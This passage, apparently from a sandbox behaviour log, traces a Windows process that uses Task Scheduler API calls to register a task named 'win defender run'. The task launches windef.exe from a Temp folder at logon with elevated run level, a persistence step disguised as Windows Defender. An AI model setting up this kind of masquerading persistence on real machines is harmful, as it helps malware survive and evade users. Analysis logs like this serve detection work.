Size=0x14) returned 0x47c94d8 [0176.851] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.851] LoadStringW (in: hInstance=0x0, uID=0x20d, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="LIMITED") returned 0x7 [0176.851] lstrlenW (lpString="LIMITED") returned 7 [0176.851] GetProcessHeap () returned 0x47c0000 [0176.851] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47caa80 [0176.851] GetThreadLocale () returned 0x409 [0176.852] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="HIGHEST", cchCount1=-1, lpString2="LIMITED", cchCount2=-1) returned 1 [0176.852] GetProcessHeap () returned 0x47c0000 [0176.852] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9558 [0176.852] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.852] LoadStringW (in: hInstance=0x0, uID=0x20e, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="HIGHEST") returned 0x7 [0176.852] lstrlenW (lpString="HIGHEST") returned 7 [0176.852] GetProcessHeap () returned 0x47c0000 [0176.852] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47caa98 [0176.852] GetThreadLocale () returned 0x409 [0176.852] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="HIGHEST", cchCount1=-1, lpString2="HIGHEST", cchCount2=-1) returned 2 [0176.852] GetProcessHeap () returned 0x47c0000 [0176.852] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9598 [0176.852] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.852] LoadStringW (in: hInstance=0x0, uID=0x1ae, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="MINUTE") returned 0x6 [0176.852] lstrlenW (lpString="MINUTE") returned 6 [0176.852] GetProcessHeap () returned 0x47c0000 [0176.852] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0xe) returned 0x47cab88 [0176.852] GetThreadLocale () returned 0x409 [0176.852] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="MINUTE", cchCount2=-1) returned 3 [0176.852] GetProcessHeap () returned 0x47c0000 [0176.852] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9698 [0176.852] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.852] LoadStringW (in: hInstance=0x0, uID=0x1af, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="HOURLY") returned 0x6 [0176.853] lstrlenW (lpString="HOURLY") returned 6 [0176.853] GetProcessHeap () returned 0x47c0000 [0176.853] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0xe) returned 0x47caba0 [0176.853] GetThreadLocale () returned 0x409 [0176.853] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="HOURLY", cchCount2=-1) returned 3 [0176.853] GetProcessHeap () returned 0x47c0000 [0176.853] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9618 [0176.853] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.853] LoadStringW (in: hInstance=0x0, uID=0x1b0, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="DAILY") returned 0x5 [0176.853] lstrlenW (lpString="DAILY") returned 5 [0176.853] GetProcessHeap () returned 0x47c0000 [0176.853] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0xc) returned 0x47caac8 [0176.853] GetThreadLocale () returned 0x409 [0176.853] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="DAILY", cchCount2=-1) returned 3 [0176.853] GetProcessHeap () returned 0x47c0000 [0176.853] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c9318 [0176.853] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.853] LoadStringW (in: hInstance=0x0, uID=0x1b1, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="WEEKLY") returned 0x6 [0176.853] lstrlenW (lpString="WEEKLY") returned 6 [0176.853] GetProcessHeap () returned 0x47c0000 [0176.853] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0xe) returned 0x47ca9c0 [0176.853] GetThreadLocale () returned 0x409 [0176.853] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="WEEKLY", cchCount2=-1) returned 1 [0176.853] GetProcessHeap () returned 0x47c0000 [0176.854] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x14) returned 0x47c96d8 [0176.854] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.854] LoadStringW (in: hInstance=0x0, uID=0x1b2, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="MONTHLY") returned 0x7 [0176.854] lstrlenW (lpString="MONTHLY") returned 7 [0176.854] GetProcessHeap () returned 0x47c0000 [0176.854] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47cabd0 [0176.854] GetThreadLocale () returned 0x409 [0176.854] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="MONTHLY", cchCount2=-1) returned 3 [0176.854] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.854] LoadStringW (in: hInstance=0x0, uID=0x1b3, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="ONCE") returned 0x4 [0176.854] lstrlenW (lpString="ONCE") returned 4 [0176.854] GetProcessHeap () returned 0x47c0000 [0176.854] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0xa) returned 0x47cac60 [0176.855] GetThreadLocale () returned 0x409 [0176.855] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="ONCE", cchCount2=-1) returned 3 [0176.855] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.855] LoadStringW (in: hInstance=0x0, uID=0x1b4, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="ONSTART") returned 0x7 [0176.855] lstrlenW (lpString="ONSTART") returned 7 [0176.855] GetThreadLocale () returned 0x409 [0176.855] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="ONSTART", cchCount2=-1) returned 1 [0176.855] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.855] LoadStringW (in: hInstance=0x0, uID=0x1b5, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="ONLOGON") returned 0x7 [0176.855] lstrlenW (lpString="ONLOGON") returned 7 [0176.855] GetThreadLocale () returned 0x409 [0176.856] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="ONLOGON", cchCount2=-1) returned 2 [0176.856] RtlRestoreLastWin32Error () returned 0x0 [0176.856] GetProcessHeap () returned 0x47c0000 [0176.856] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x1fc) returned 0x47c9da8 [0176.856] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.856] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0176.856] lstrlenW (lpString="First") returned 5 [0176.856] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.856] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0176.856] lstrlenW (lpString="Second") returned 6 [0176.857] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.857] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0176.857] lstrlenW (lpString="Third") returned 5 [0176.857] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.857] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0176.857] lstrlenW (lpString="Fourth") returned 6 [0176.857] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.857] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0176.857] lstrlenW (lpString="Last") returned 4 [0176.857] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.857] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0176.857] lstrlenW (lpString="First") returned 5 [0176.857] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.858] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0176.858] lstrlenW (lpString="Second") returned 6 [0176.858] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.858] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0176.858] lstrlenW (lpString="Third") returned 5 [0176.858] GetProcessHeap () returned 0x47c0000 [0176.858] GetProcessHeap () returned 0x47c0000 [0176.858] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cac60) returned 1 [0176.858] GetProcessHeap () returned 0x47c0000 [0176.858] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cac60) returned 0xa [0176.858] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cac60) returned 1 [0176.858] GetProcessHeap () returned 0x47c0000 [0176.858] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0xc) returned 0x47ca9d8 [0176.858] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.858] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0176.858] lstrlenW (lpString="Fourth") returned 6 [0176.858] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.859] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0176.859] lstrlenW (lpString="Last") returned 4 [0176.859] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0xdcde8, cchData=128 | out: lpLCData="0") returned 2 [0176.859] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.859] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0176.859] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0176.859] GetProcessHeap () returned 0x47c0000 [0176.859] GetProcessHeap () returned 0x47c0000 [0176.859] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47caa80) returned 1 [0176.859] GetProcessHeap () returned 0x47c0000 [0176.859] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47caa80) returned 0x10 [0176.859] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47caa80) returned 1 [0176.860] GetProcessHeap () returned 0x47c0000 [0176.860] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x16) returned 0x47c9378 [0176.860] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0xdcdec, cchData=128 | out: lpLCData="0") returned 2 [0176.860] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.860] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0176.860] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0176.860] GetProcessHeap () returned 0x47c0000 [0176.860] GetProcessHeap () returned 0x47c0000 [0176.860] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47caa98) returned 1 [0176.860] GetProcessHeap () returned 0x47c0000 [0176.860] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47caa98) returned 0x10 [0176.861] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47caa98) returned 1 [0176.861] GetProcessHeap () returned 0x47c0000 [0176.861] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x16) returned 0x47c9398 [0176.861] GetLocalTime (in: lpSystemTime=0xdcfcc | out: lpSystemTime=0xdcfcc*(wYear=0x7e5, wMonth=0x9, wDayOfWeek=0x2, wDay=0x1c, wHour=0xc, wMinute=0x11, wSecond=0x2, wMilliseconds=0x148)) [0176.861] GetLocalTime (in: lpSystemTime=0xdd480 | out: lpSystemTime=0xdd480*(wYear=0x7e5, wMonth=0x9, wDayOfWeek=0x2, wDay=0x1c, wHour=0xc, wMinute=0x11, wSecond=0x2, wMilliseconds=0x149)) [0176.862] lstrlenW (lpString="") returned 0 [0176.862] lstrlenW (lpString="") returned 0 [0176.862] lstrlenW (lpString="") returned 0 [0176.862] lstrlenW (lpString="") returned 0 [0176.862] lstrlenW (lpString="") returned 0 [0176.862] lstrlenW (lpString="") returned 0 [0176.862] lstrlenW (lpString="") returned 0 [0176.862] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0176.871] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0177.223] CoCreateInstance (in: rclsid=0x3a26c0*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x3a26d0*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0xdd39c | out: ppv=0xdd39c*=0x303758) returned 0x0 [0177.593] TaskScheduler:ITaskService:Connect (This=0x303758, serverName=0xdd34c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0xdd35c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0xdd36c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0xdd37c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0177.642] TaskScheduler:ITaskService:GetFolder (in: This=0x303758, Path=0x0, ppFolder=0xdd464 | out: ppFolder=0xdd464*=0x303880) returned 0x0 [0177.646] TaskScheduler:ITaskService:NewTask (in: This=0x303758, flags=0x0, ppDefinition=0xdd474 | out: ppDefinition=0xdd474*=0x3038d0) returned 0x0 [0177.647] ITaskDefinition:get_Actions (in: This=0x3038d0, ppActions=0xdd3e8 | out: ppActions=0xdd3e8*=0x303920) returned 0x0 [0177.647] IActionCollection:Create (in: This=0x303920, Type=0, ppAction=0xdd3ec | out: ppAction=0xdd3ec*=0x303b78) returned 0x0 [0177.647] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe") returned 47 [0177.647] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe") returned 47 [0177.647] lstrlenW (lpString=" ") returned 1 [0177.647] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0177.647] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0177.647] StrChrW (lpStart=" ", wMatch=0x3a) returned 0x0 [0177.647] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0177.647] StrChrW (lpStart=" ", wMatch=0x55) returned 0x0 [0177.647] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0177.647] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x52) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x44) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x48) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x4a) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x30) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x7e) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x31) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x41) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x44) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x4c) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x6f) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x63) returned 0x0 [0177.648] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0177.649] StrChrW (lpStart=" ", wMatch=0x6c) returned 0x0 [0177.649] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0177.649] StrChrW (lpStart=" ", wMatch=0x54) returned 0x0 [0177.649] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0177.649] StrChrW (lpStart=" ", wMatch=0x6d) returned 0x0 [0177.649] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0177.649] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0177.649] StrChrW (lpStart=" ", wMatch=0x77) returned 0x0 [0177.649] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0177.649] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0177.649] StrChrW (lpStart=" ", wMatch=0x64) returned 0x0 [0177.649] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0177.649] StrChrW (lpStart=" ", wMatch=0x66) returned 0x0 [0177.649] StrChrW (lpStart=" ", wMatch=0x2e) returned 0x0 [0177.649] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0177.649] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0177.649] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0177.649] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe") returned 47 [0177.649] StrChrIW (lpStart="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe", wMatch=0x20) returned 0x0 [0177.649] RtlRestoreLastWin32Error () returned 0x490 [0177.650] IUnknown:Release (This=0x303b78) returned 0x1 [0177.650] IUnknown:Release (This=0x303920) returned 0x1 [0177.650] ITaskDefinition:get_Triggers (in: This=0x3038d0, ppTriggers=0xdcfb8 | out: ppTriggers=0xdcfb8*=0x303ac0) returned 0x0 [0177.650] ITriggerCollection:Create (in: This=0x303ac0, Type=9, ppTrigger=0xdcfcc | out: ppTrigger=0xdcfcc*=0x303bb8) returned 0x0 [0177.651] IUnknown:QueryInterface (in: This=0x303bb8, riid=0x3a13b4*(Data1=0x72dade38, Data2=0xfae4, Data3=0x4b3e, Data4=([0]=0xba, [1]=0xf4, [2]=0x5d, [3]=0x0, [4]=0x9a, [5]=0xf0, [6]=0x2b, [7]=0x1c)), ppvObject=0xdcfb4 | out: ppvObject=0xdcfb4*=0x303bb8) returned 0x0 [0177.651] IUnknown:Release (This=0x303bb8) returned 0x2 [0177.652] _vsnwprintf (in: _Buffer=0xdcf3c, _BufferCount=0x1f, _Format="%04u-%02u-%02dT%02u:%02u:00", _ArgList=0xdcf1c | out: _Buffer="2021-09-28T12:17:00") returned 19 [0177.713] ITrigger:put_StartBoundary (This=0x303bb8, StartBoundary="2021-09-28T12:17:00") returned 0x0 [0177.713] lstrlenW (lpString="") returned 0 [0177.713] lstrlenW (lpString="") returned 0 [0177.713] lstrlenW (lpString="") returned 0 [0177.713] lstrlenW (lpString="") returned 0 [0177.714] IUnknown:Release (This=0x303bb8) returned 0x1 [0177.714] IUnknown:Release (This=0x303ac0) returned 0x1 [0177.714] ITaskDefinition:get_Settings (in: This=0x3038d0, ppSettings=0xdd3f4 | out: ppSettings=0xdd3f4*=0x3039d8) returned 0x0 [0177.714] lstrlenW (lpString="") returned 0 [0177.714] IUnknown:Release (This=0x3039d8) returned 0x3 [0177.714] GetLocalTime (in: lpSystemTime=0xdd2e8 | out: lpSystemTime=0xdd2e8*(wYear=0x7e5, wMonth=0x9, wDayOfWeek=0x2, wDay=0x1c, wHour=0xc, wMinute=0x11, wSecond=0x3, wMilliseconds=0xb6)) [0177.714] ResolveDelayLoadedAPI () returned 0x7462c5f0 [0177.715] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xdd2f8, nSize=0xdd2e0 | out: lpNameBuffer="XC64ZB\\RDhJ0CNFevzX", nSize=0xdd2e0) returned 0x1 [0177.716] ITaskDefinition:get_RegistrationInfo (in: This=0x3038d0, ppRegistrationInfo=0xdd2e4 | out: ppRegistrationInfo=0xdd2e4*=0x303968) returned 0x0 [0177.717] IRegistrationInfo:put_Author (This=0x303968, Author="XC64ZB\\RDhJ0CNFevzX") returned 0x0 [0177.717] _vsnwprintf (in: _Buffer=0xdd2f8, _BufferCount=0x7f, _Format="%d-%02d-%02dT%02d:%02d:%02d", _ArgList=0xdd2b8 | out: _Buffer="2021-09-28T12:17:03") returned 19 [0177.718] IRegistrationInfo:put_Date (This=0x303968, Date="2021-09-28T12:17:03") returned 0x0 [0177.718] IUnknown:Release (This=0x303968) returned 0x1 [0177.718] malloc (_Size=0xc) returned 0x303c48 [0177.718] free (_Block=0x303c48) [0177.718] lstrlenW (lpString="") returned 0 [0177.718] ITaskDefinition:get_Principal (in: This=0x3038d0, ppPrincipal=0xdd47c | out: ppPrincipal=0xdd47c*=0x303b00) returned 0x0 [0177.719] IPrincipal:put_RunLevel (This=0x303b00, RunLevel=1) returned 0x0 [0177.719] IUnknown:Release (This=0x303b00) returned 0x1 [0177.719] malloc (_Size=0xc) returned 0x303c48 [0177.719] ITaskFolder:RegisterTaskDefinition (in: This=0x303880, Path="win defender run", pDefinition=0x3038d0, flags=6, UserId=0xdd3d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0xdd3e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=3, sddl=0xdd3fc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), ppTask=0xdd444 | out: ppTask=0xdd444*=0x3029d8) returned 0x0 [0177.964] free (_Block=0x303c48) [0177.964] _memicmp (_Buf1=0x47c75b0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0177.964] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x47ca788, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40 [0177.964] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64 [0177.964] GetProcessHeap () returned 0x47c0000 [0177.964] GetProcessHeap () returned 0x47c0000 [0177.964] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cab88) returned 1 [0177.964] GetProcessHeap () returned 0x47c0000 [0177.964] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cab88) returned 0xe [0177.965] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cab88) returned 1 [0177.965] GetProcessHeap () returned 0x47c0000 [0177.965] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x82) returned 0x47d9dd8 [0177.965] _vsnwprintf (in: _Buffer=0xdd898, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0xdd40c | out: _Buffer="SUCCESS: The scheduled task \"win defender run\" has successfully been created.\n") returned 78 [0177.965] __iob_func () returned 0x75731208 [0177.965] _fileno (_File=0x75731228) returned 1 [0177.965] _errno () returned 0x3005b0 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x3c [0177.965] _errno () returned 0x3005b0 [0177.965] GetFileType (hFile=0x3c) returned 0x2 [0177.965] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0177.965] GetFileType (hFile=0x3c) returned 0x2 [0177.965] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdd3e0 | out: lpMode=0xdd3e0) returned 1 [0178.049] __iob_func () returned 0x75731208 [0178.049] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0178.049] lstrlenW (lpString="SUCCESS: The scheduled task \"win defender run\" has successfully been created.\n") returned 78 [0178.049] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdd898*, nNumberOfCharsToWrite=0x4e, lpNumberOfCharsWritten=0xdd404, lpReserved=0x0 | out: lpBuffer=0xdd898*, lpNumberOfCharsWritten=0xdd404*=0x4e) returned 1 [0178.125] IUnknown:Release (This=0x3029d8) returned 0x0 [0178.126] TaskScheduler:IUnknown:Release (This=0x3038d0) returned 0x0 [0178.126] TaskScheduler:IUnknown:Release (This=0x303880) returned 0x0 [0178.126] TaskScheduler:IUnknown:Release (This=0x303758) returned 0x0 [0178.126] lstrlenW (lpString="") returned 0 [0178.126] GetProcessHeap () returned 0x47c0000 [0178.126] GetProcessHeap () returned 0x47c0000 [0178.126] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9da8) returned 1 [0178.126] GetProcessHeap () returned 0x47c0000 [0178.126] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9da8) returned 0x1fc [0178.126] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9da8) returned 1 [0178.126] GetProcessHeap () returned 0x47c0000 [0178.126] GetProcessHeap () returned 0x47c0000 [0178.126] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9498) returned 1 [0178.126] GetProcessHeap () returned 0x47c0000 [0178.126] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9498) returned 0x16 [0178.126] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9498) returned 1 [0178.127] GetProcessHeap () returned 0x47c0000 [0178.127] GetProcessHeap () returned 0x47c0000 [0178.127] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cab58) returned 1 [0178.127] GetProcessHeap () returned 0x47c0000 [0178.127] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cab58) returned 0x10 [0178.127] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cab58) returned 1 [0178.127] GetProcessHeap () returned 0x47c0000 [0178.127] GetProcessHeap () returned 0x47c0000 [0178.127] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c94b8) returned 1 [0178.127] GetProcessHeap () returned 0x47c0000 [0178.127] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c94b8) returned 0x14 [0178.127] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c94b8) returned 1 [0178.127] GetProcessHeap () returned 0x47c0000 [0178.127] GetProcessHeap () returned 0x47c0000 [0178.127] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c69d0) returned 1 [0178.127] GetProcessHeap () 